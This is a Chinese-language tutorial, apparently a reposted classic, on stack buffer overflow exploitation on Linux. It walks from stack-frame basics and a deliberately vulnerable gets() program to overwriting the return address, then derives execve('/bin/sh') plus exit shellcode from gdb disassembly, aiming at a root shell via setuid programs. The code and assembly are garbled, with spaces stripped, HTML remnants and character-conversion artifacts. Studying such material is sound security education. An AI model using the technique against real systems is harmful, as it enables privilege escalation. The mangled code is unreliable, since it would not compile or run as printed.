關(guān)于堆棧溢出技術(shù)你知道多少?

雖然溢出在程序開(kāi)發(fā)過(guò)程中不可完全避免，但溢出對(duì)系統(tǒng)的威脅是巨大的，由于系統(tǒng)的特殊性，溢出發(fā)生時(shí)攻擊者可以利用其漏洞來(lái)獲取系統(tǒng)的高級(jí)權(quán)限r(nóng)oot，因此本文將詳細(xì)介紹堆棧溢出技術(shù)……

在您開(kāi)始了解堆棧溢出前，首先你應(yīng)該了解win32匯編語(yǔ)言，熟悉寄存器的組成和功能。你必須有堆棧和存儲(chǔ)分配方面的基礎(chǔ)知識(shí)，有關(guān)這方面的計(jì)算機(jī)書(shū)籍很多，我將只是簡(jiǎn)單闡述原理，著重在應(yīng)用。其次，你應(yīng)該了解linux，本講中我們的例子將在linux上開(kāi)發(fā)。

1、首先復(fù)習(xí)一下基礎(chǔ)知識(shí)。

從物理上講，堆棧是就是一段連續(xù)分配的內(nèi)存空間。在一個(gè)程序中，會(huì)聲明各種變量。靜態(tài)全局變量是位于數(shù)據(jù)段并且在程序開(kāi)始運(yùn)行的時(shí)候被加載。而程序的動(dòng)態(tài)的局部變量則分配在堆棧里面。

從操作上來(lái)講，堆棧是一個(gè)先入后出的隊(duì)列。他的生長(zhǎng)方向與內(nèi)存的生長(zhǎng)方向正好相反。我們規(guī)定內(nèi)存的生長(zhǎng)方向?yàn)橄蛏?，則棧的生長(zhǎng)方向?yàn)橄蛳?。壓棧的操作push=ESP-4，出棧的操作是pop=ESP+4.換句話說(shuō)，堆棧中老的值，其內(nèi)存地址，反而比新的值要大。請(qǐng)牢牢記住這一點(diǎn)，因?yàn)檫@是堆棧溢出的基本理論依據(jù)。

在一次函數(shù)調(diào)用中，堆棧中將被依次壓入：參數(shù)，返回地址，EBP。如果函數(shù)有局部變量，接下來(lái)，就在堆棧中開(kāi)辟相應(yīng)的空間以構(gòu)造變量。函數(shù)執(zhí)行結(jié)束，這些局部變量的內(nèi)容將被丟失。但是不被清除。在函數(shù)返回的時(shí)候，彈出EBP，恢復(fù)堆棧到函數(shù)調(diào)用的地址,彈出返回地址到EIP以繼續(xù)執(zhí)行程序。

在C語(yǔ)言程序中，參數(shù)的壓棧順序是反向的。比如func(a,b,c)。在參數(shù)入棧的時(shí)候，是：先壓c，再壓b,最后a。在取參數(shù)的時(shí)候，由于棧的先入后出，先取棧頂?shù)腶，再取b,最后取c。這些是匯編語(yǔ)言的基礎(chǔ)知識(shí)，用戶(hù)在開(kāi)始前必須要了解這些知識(shí)。

2、現(xiàn)在我們來(lái)看一看什么是堆棧溢出。

運(yùn)行時(shí)的堆棧分配

堆棧溢出就是不顧堆棧中數(shù)據(jù)塊大小，向該數(shù)據(jù)塊寫(xiě)入了過(guò)多的數(shù)據(jù)，導(dǎo)致數(shù)據(jù)越界，結(jié)果覆蓋了老的堆棧數(shù)據(jù)。

例如程序一：

#includeintmain(){charname[8];printf("Pleasetypeyourname:");gets(name);printf("Hello,%s!",name);return0;}

編譯并且執(zhí)行，我們輸入ipxodi,就會(huì)輸出Hello,ipxodi!。程序運(yùn)行中，堆棧是怎么操作的呢?

在main函數(shù)開(kāi)始運(yùn)行的時(shí)候，堆棧里面將被依次放入返回地址，EBP。

我們用gcc -S 來(lái)獲得匯編語(yǔ)言輸出，可以看到main函數(shù)的開(kāi)頭部分對(duì)應(yīng)如下語(yǔ)句：

pushl%ebpmovl%esp,%ebpsubl$8,%esp

首先他把EBP保存下來(lái)，，然后EBP等于現(xiàn)在的ESP，這樣EBP就可以用來(lái)訪問(wèn)本函數(shù)的局部變量。之后ESP減8，就是堆棧向上增長(zhǎng)8個(gè)字節(jié)，用來(lái)存放name[]數(shù)組。最后，main返回，彈出ret里的地址，賦值給EIP，CPU繼續(xù)執(zhí)行EIP所指向的指令。

堆棧溢出

現(xiàn)在我們?cè)賵?zhí)行一次，輸入ipxodiAAAAAAAAAAAAAAA,執(zhí)行完gets(name)之后，由于我們輸入的name字符串太長(zhǎng)，name數(shù)組容納不下，只好向內(nèi)存頂部繼續(xù)寫(xiě)‘A’。由于堆棧的生長(zhǎng)方向與內(nèi)存的生長(zhǎng)方向相反，這些‘A’覆蓋了堆棧的老的元素。 我們可以發(fā)現(xiàn)，EBP，ret都已經(jīng)被‘A’覆蓋了。在main返回的時(shí)候，就會(huì)把‘AAAA’的ASCII碼：0x41414141作為返回地址，CPU會(huì)試圖執(zhí)行0x41414141處的指令，結(jié)果出現(xiàn)錯(cuò)誤。這就是一次堆棧溢出。

3、如何利用堆棧溢出

我們已經(jīng)制造了一次堆棧溢出。其原理可以概括為：由于字符串處理函數(shù)(gets，strcpy等等)沒(méi)有對(duì)數(shù)組越界加以監(jiān)視和限制，我們利用字符數(shù)組寫(xiě)越界，覆蓋堆棧中的老元素的值，就可以修改返回地址。

在上面的例子中，這導(dǎo)致CPU去訪問(wèn)一個(gè)不存在的指令，結(jié)果出錯(cuò)。事實(shí)上，當(dāng)堆棧溢出的時(shí)候，我們已經(jīng)完全的控制了這個(gè)程序下一步的動(dòng)作。如果我們用一個(gè)實(shí)際存在指令地址來(lái)覆蓋這個(gè)返回地址，CPU就會(huì)轉(zhuǎn)而執(zhí)行我們的指令。

在UINX/linux系統(tǒng)中，我們的指令可以執(zhí)行一個(gè)shell，這個(gè)shell將獲得和被我們堆棧溢出的程序相同的權(quán)限。如果這個(gè)程序是setuid的，那么我們就可以獲得root shell。下一講將敘述如何書(shū)寫(xiě)一個(gè)shell code。

如何書(shū)寫(xiě)一個(gè)shell code

一：shellcode基本算法分析

在程序中，執(zhí)行一個(gè)shell的程序是這樣寫(xiě)的：

shellcode.c------------------------------------------------------------------------#includevoidmain(){char*name[2];name[0]="/bin/sh"name[1]=NULL;execve(name[0],name,NULL);}------------------------------------------------------------------------

execve函數(shù)將執(zhí)行一個(gè)程序。他需要程序的名字地址作為第一個(gè)參數(shù)。一個(gè)內(nèi)容為該程序的argv[i](argv[n-1]=0)的指針數(shù)組作為第二個(gè)參數(shù)，以及(char*) 0作為第三個(gè)參數(shù)。

我們來(lái)看以看execve的匯編代碼：

[nkl10]$Content$nbsp;gcc-oshellcode-staticshellcode.c[nkl10]$Content$nbsp;gdbshellcode(gdb)disassemble__execveDumpofassemblercodeforfunction__execve:0x80002bc<__execve>:pushl%ebp;0x80002bd<__execve+1>:movl%esp,%ebp;上面是函數(shù)頭。0x80002bf<__execve+3>:pushl%ebx;保存ebx0x80002c0<__execve+4>:movl$0xb,%eax;eax=0xb，eax指明第幾號(hào)系統(tǒng)調(diào)用。0x80002c5<__execve+9>:movl0x8(%ebp),%ebx;ebp+8是第一個(gè)參數(shù)"/bin/sh\0"0x80002c8<__execve+12>:movl0xc(%ebp),%ecx;ebp+12是第二個(gè)參數(shù)name數(shù)組的地址0x80002cb<__execve+15>:movl0x10(%ebp),%edx;ebp+16是第三個(gè)參數(shù)空指針的地址。;name[2-1]內(nèi)容為NULL，用來(lái)存放返回值。0x80002ce<__execve+18>:int$0x80;執(zhí)行0xb號(hào)系統(tǒng)調(diào)用(execve)0x80002d0<__execve+20>:movl%eax,%edx;下面是返回值的處理就沒(méi)有用了。0x80002d2<__execve+22>:testl%edx,%edx0x80002d4<__execve+24>:jnl0x80002e6<__execve+42>0x80002d6<__execve+26>:negl%edx0x80002d8<__execve+28>:pushl%edx0x80002d9<__execve+29>:call0x8001a34<__normal_errno_location>0x80002de<__execve+34>:popl%edx0x80002df<__execve+35>:movl%edx,(%eax)0x80002e1<__execve+37>:movl$0xffffffff,%eax0x80002e6<__execve+42>:popl%ebx0x80002e7<__execve+43>:movl%ebp,%esp0x80002e9<__execve+45>:popl%ebp0x80002ea<__execve+46>:ret0x80002eb<__execve+47>:nopEndofassemblerdump.

經(jīng)過(guò)以上的分析，可以得到如下的精簡(jiǎn)指令算法：

movl$execve的系統(tǒng)調(diào)用號(hào),%eax

movl"bin/sh\0"的地址,%ebxmovlname數(shù)組的地址,%ecxmovlname[n-1]的地址,%edxint$0x80;執(zhí)行系統(tǒng)調(diào)用(execve)

當(dāng)execve執(zhí)行成功后，程序shellcode就會(huì)退出，/bin/sh將作為子進(jìn)程繼續(xù)執(zhí)行?？墒牵绻覀兊膃xecve執(zhí)行失敗，(比如沒(méi)有/bin/sh這個(gè)文件)，CPU就會(huì)繼續(xù)執(zhí)行后續(xù)的指令，結(jié)果不知道跑到哪里去了。所以必須再執(zhí)行一個(gè)exit()系統(tǒng)調(diào)用，結(jié)束shellcode.c的執(zhí)行。

我們來(lái)看以看exit(0)的匯編代碼：

(gdb)disassemble_exitDumpofassemblercodeforfunction_exit:0x800034c<_exit>:pushl%ebp0x800034d<_exit+1>:movl%esp,%ebp0x800034f<_exit+3>:pushl%ebx0x8000350<_exit+4>:movl$0x1,%eax;1號(hào)系統(tǒng)調(diào)用0x8000355<_exit+9>:movl0x8(%ebp),%ebx;ebx為參數(shù)00x8000358<_exit+12>:int$0x80;引發(fā)系統(tǒng)調(diào)用0x800035a<_exit+14>:movl0xfffffffc(%ebp),%ebx0x800035d<_exit+17>:movl%ebp,%esp0x800035f<_exit+19>:popl%ebp0x8000360<_exit+20>:ret0x8000361<_exit+21>:nop0x8000362<_exit+22>:nop0x8000363<_exit+23>:nopEndofassemblerdump.

看來(lái)exit(0)〕的匯編代碼更加簡(jiǎn)單：

movl$0x1,%eax;1號(hào)系統(tǒng)調(diào)用movl0,%ebx;ebx為exit的參數(shù)0int$0x80;引發(fā)系統(tǒng)調(diào)用

那么總結(jié)一下，合成的匯編代碼為：

movl$execve的系統(tǒng)調(diào)用號(hào),%eax

movl"bin/sh\0"的地址,%ebxmovlname數(shù)組的地址,%ecxmovlname[n-1]的地址,%edxint$0x80;執(zhí)行系統(tǒng)調(diào)用(execve)movl$0x1,%eax;1號(hào)系統(tǒng)調(diào)用movl0,%ebx;ebx為exit的參數(shù)0int$0x80;執(zhí)行系統(tǒng)調(diào)用(exit)